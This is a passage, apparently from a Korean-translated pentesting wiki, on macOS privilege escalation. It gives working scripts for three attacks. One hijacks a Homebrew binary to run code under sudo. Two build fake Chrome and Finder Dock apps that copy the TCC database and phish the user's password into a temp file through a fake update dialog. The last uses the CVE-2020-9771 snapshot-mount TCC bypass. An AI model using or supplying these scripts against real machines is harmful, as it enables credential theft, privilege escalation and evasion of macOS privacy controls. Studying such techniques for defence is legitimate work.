그러나 macOS는 사용자가 **sudo**를 실행할 때 사용자의 **PATH**를 유지합니다. 즉, 이 공격을 달성하는 또 다른 방법은 피해자가 sudo를 실행할 때 여전히 실행할 다른 바이너리를 하이재킹하는 것입니다:
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATHcat>/opt/homebrew/bin/ls<<EOF#!/bin/bashif [ "\$(id -u)" -eq 0 ]; thenwhoami > /tmp/privescfi/bin/ls "\$@"EOFchmod+x/opt/homebrew/bin/ls# victimsudols
Note that a user that uses the terminal will highly probable have Homebrew installed. So it's possible to hijack binaries in /opt/homebrew/bin.
Dock Impersonation
Using some social engineering you could impersonate for example Google Chrome inside the dock and actually execute your own script:
Some suggestions:
Check in the Dock if there is a Chrome, and in that case remove that entry and add the fakeChrome entry in the same position in the Dock array.
#!/bin/sh# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';rm-rf/tmp/Google\ Chrome.app/2>/dev/null# Create App structuremkdir-p/tmp/Google\ Chrome.app/Contents/MacOSmkdir-p/tmp/Google\ Chrome.app/Contents/Resources# Payload to executecat>/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /Applications/Google\\\\ Chrome.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c-o/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chromerm-rf/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.cchmod+x/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome# Info.plistcat<<EOF>/tmp/Google\ Chrome.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Google Chrome</string><key>CFBundleIdentifier</key><string>com.google.Chrome</string><key>CFBundleName</key><string>Google Chrome</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Google Chromecp/Applications/Google\ Chrome.app/Contents/Resources/app.icns/tmp/Google\ Chrome.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
몇 가지 제안:
당신은 Finder를 Dock에서 제거할 수 없습니다, 그래서 Dock에 추가할 경우, 가짜 Finder를 진짜 Finder 바로 옆에 두는 것이 좋습니다. 이를 위해서는 Dock 배열의 시작 부분에 가짜 Finder 항목을 추가해야 합니다.
또 다른 옵션은 Dock에 배치하지 않고 그냥 열어두는 것입니다. "Finder가 Finder를 제어하겠다고 요청합니다"는 그렇게 이상하지 않습니다.
비밀번호를 묻는 끔찍한 상자 없이 루트로 상승하는 또 다른 옵션은 Finder가 특권 작업을 수행하기 위해 실제로 비밀번호를 요청하도록 만드는 것입니다:
Finder에게 **/etc/pam.d**에 새로운 sudo 파일을 복사하도록 요청합니다 (비밀번호를 요청하는 프롬프트는 "Finder가 sudo를 복사하려고 합니다"라고 표시할 것입니다).
Finder에게 새로운 Authorization Plugin을 복사하도록 요청합니다 (파일 이름을 제어할 수 있으므로 비밀번호를 요청하는 프롬프트는 "Finder가 Finder.bundle을 복사하려고 합니다"라고 표시할 것입니다).
#!/bin/sh# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';rm-rf/tmp/Finder.app/2>/dev/null# Create App structuremkdir-p/tmp/Finder.app/Contents/MacOSmkdir-p/tmp/Finder.app/Contents/Resources# Payload to executecat>/tmp/Finder.app/Contents/MacOS/Finder.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /System/Library/CoreServices/Finder.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Finder.app/Contents/MacOS/Finder.c-o/tmp/Finder.app/Contents/MacOS/Finderrm-rf/tmp/Finder.app/Contents/MacOS/Finder.cchmod+x/tmp/Finder.app/Contents/MacOS/Finder# Info.plistcat<<EOF>/tmp/Finder.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Finder</string><key>CFBundleIdentifier</key><string>com.apple.finder</string><key>CFBundleName</key><string>Finder</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Findercp/System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns/tmp/Finder.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
TCC - 루트 권한 상승
CVE-2020-9771 - mount_apfs TCC 우회 및 권한 상승
모든 사용자 (특권이 없는 사용자 포함)는 타임 머신 스냅샷을 생성하고 마운트하여 해당 스냅샷의 모든 파일에 접근할 수 있습니다.
필요한 유일한 특권은 사용되는 애플리케이션(예: Terminal)이 전체 디스크 접근(FDA) 권한(kTCCServiceSystemPolicyAllfiles)을 가져야 하며, 이는 관리자가 부여해야 합니다.
# Create snapshottmutillocalsnapshot# List snapshotstmutillistlocalsnapshots/Snapshotsfordisk/:com.apple.TimeMachine.2023-05-29-001751.local# Generate folder to mount itcd/tmp# I didn it from this foldermkdir/tmp/snap# Mount it, "noowners" will mount the folder so the current user can access everything/sbin/mount_apfs-onoowners-scom.apple.TimeMachine.2023-05-29-001751.local/System/Volumes/Data/tmp/snap# Access itls/tmp/snap/Users/admin_user# This will work